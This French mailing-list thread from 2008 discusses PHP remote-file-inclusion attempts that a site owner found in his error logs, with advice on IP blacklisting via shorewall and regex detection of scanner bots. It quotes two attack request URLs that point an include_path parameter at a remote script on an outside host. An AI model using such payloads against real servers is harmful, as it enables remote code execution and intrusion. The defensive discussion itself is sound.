Le 02/04/08, Nicolas Boulay<[EMAIL PROTECTED]> a écrit : > En gros tu blacklists l'ip pendant quelques heures ? oui en utilisant shorewall drop adresse_ip mais vu que ce sont souvent les memes adresses ip qui reviennent je les blacklist definitivement en fait ( jusqu'au prochain reboot du firewall ou du serveur , ce qaui peut facilement faire 6 mois de drop ;)
> > Le 02/04/08, neofutur<[EMAIL PROTECTED]> a écrit : > > > oui, ce sont des robots de recherche de failles, des requetes de ce > > genre j'en ai des milliers chaque jour sur mes serveurs, au point que > > generalement il y a plus de charge en provenance des robotsd qu'en > > provenance des visiteurs reels. > > > > En general ces robots testent des failles connues pour un cms ( > > joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur > > tous les sites du web sans chercher a savoir si le site web possede le > > logiciel concerne par la faille. > > D'une maniere generale tu ne risque rien.si ton site web n'utilise > > pas le logiciel concerne par la faille recherchée, le seul vrai risque > > est pour l'hebergeur de ton site qui, s'il heberge des dizaines de > > sites web sur un meme serveur, risque d'etre surcharge par des > > dizaines de requetes de ce genre a la minute. > > Sur certains de mes serveurs j'ai du en arriver a creer des > > expressions regulieres qui detectent dce genre de requetres bidon pour > > ensuite dropper reguilierement les adresses ips utilisees par ces > > robots, sans quoi ils generent tellement de charge sur le serveur que > > les sites peuvent etre injoignables pour les vrais utilisateurs. > > > > Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit : > > > > > Bonjour, > > > > > > Sur mon site en PHP, je repère des tentatives d'intrusion / prise de > > > contrôle / récupération de données sensibles. Elles n'ont pas l'air > > > efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un > > > log d'erreur), et se font par massage de paramètres. > > > Exemple : > > > > http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > > > ou même : > > > > http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > > > Comme je n'ai pas de page config_settings.php et que mes pages ne > > > prennent pas les paramètres de cette manière, ça ne marche pas... o_O > > > Pour voir le contenu du script que l'attaquant essaie de faire > > > tourner, voyez ce fichier texte : > > > http://www.health-nutrition-business.com/echo.txt > > > > > > La question que je me pose : ces attaques sont-elles conçus pour des > > > programmes PHP connus (par exemple phpBB), ou bien peuvent-elles > > > fonctionner sur du code maison ? > > > Comment s'en prémunir ? > > > > > > Merci > > > Yann > > > > > > -- > > > _________________________________________________________________ > > > Kaella, distribution Linux live-cd : http://kaella.linux-azur.org > > > > > > Diffusez cette liste aupres de vos relations :) > > > Linux Azur : http://linux-azur.org > > > L'auteur du post est responsable de ses écrits ! > > > *** Pas de message SMS, HTML ni de PJ SVP *** > > > > > > > > > > > -- > > Cordialement > > > > William Waisse > > http://waisse.org | http://neoskills.com > > http://cahierspip.ww7.be | http://feeder.ww7.be > > > > carte de visite : http://xena.ww7.be/my_carte2.jpg > > > > > > Diffusez cette liste aupres de vos relations :) > > Linux Azur : http://linux-azur.org > > L'auteur du post est responsable de ses écrits ! > > *** Pas de message SMS, HTML ni de PJ SVP *** > > > > Diffusez cette liste aupres de vos relations :) > Linux Azur : http://linux-azur.org > L'auteur du post est responsable de ses écrits ! > *** Pas de message SMS, HTML ni de PJ SVP *** > -- Cordialement William Waisse http://waisse.org | http://neoskills.com http://cahierspip.ww7.be | http://feeder.ww7.be carte de visite : http://xena.ww7.be/my_carte2.jpg Diffusez cette liste aupres de vos relations :) Linux Azur : http://linux-azur.org L'auteur du post est responsable de ses �crits ! *** Pas de message SMS, HTML ni de PJ SVP ***
